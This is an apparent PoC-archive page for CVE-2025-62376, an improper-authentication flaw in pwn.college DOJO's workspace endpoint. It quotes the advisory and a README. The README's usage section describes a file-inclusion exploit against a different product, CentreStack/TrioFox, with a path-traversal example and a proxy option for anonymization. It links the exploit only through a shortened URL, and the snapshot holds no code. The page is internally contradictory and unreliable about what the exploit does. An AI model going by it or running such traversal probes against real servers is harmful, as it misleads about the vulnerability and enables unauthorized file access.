Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2025-62376 PoC — pwn.college DOJO vulnerable to improper authentication in workspace endpoint allowing unauthorized Windows VM access

Source
Associated Vulnerability
Title:pwn.college DOJO vulnerable to improper authentication in workspace endpoint allowing unauthorized Windows VM access (CVE-2025-62376)
Description:pwn.college DOJO is an education platform for learning cybersecurity. Prior to commit 467db0b9ea0d9a929dc89b41f6eb59f7cfc68bef, the /workspace endpoint contains an improper authentication vulnerability that allows an attacker to access any active Windows VM without proper authorization. The vulnerability occurs in the view_desktop function where the user is retrieved via a URL parameter without verifying that the requester has administrative privileges. An attacker can supply any user ID and arbitrary password in the request parameters to impersonate another user. When requesting a Windows desktop service, the function does not validate the supplied password before generating access credentials, allowing the attacker to obtain an iframe source URL that grants full access to the target user's Windows VM. This impacts all users with active Windows VMs, as an attacker can access and modify data on the Windows machine and in the home directory of the associated Linux machine via the Z: drive. This issue has been patched in commit 467db0b9ea0d9a929dc89b41f6eb59f7cfc68bef. No known workarounds exist.
Readme
# Improper Authentication in pwn.college DOJO Education Platform(CVE-2025-62376)

### Overview

The pwn.college DOJO platform has a vulnerability in its /workspace endpoint that allows unauthorized access to active Windows VMs. This flaw arises from the view_desktop function, which inadequately verifies user authorization. An attacker can exploit this by providing a user ID and an arbitrary password, thereby impersonating other users. 

### Requirements
- Python 3.8+
- Libraries: requests, argparse (install via `pip install -r requirements.txt`)

### Usage
- Install dependencies: `pip install -r requirements.txt`
- Run the exploit: `python exploit.py --target <target_url> --file "/path/to/Web.config"`

Options:
- `--target`: URL of the vulnerable CentreStack/TrioFox instance.
- `--file`: Relative path to the file to include (e.g., "../../../../Windows/system.ini" for testing).
- `--proxy`: Optional HTTP proxy for anonymization.


### PoC Exploit - [href](http://bit.ly/46VVvzl)
File Snapshot

[4.0K] /data/pocs/86a9c197e6bb93b54d5aeef2bbc731a999f8618c └── [ 992] README.md 0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →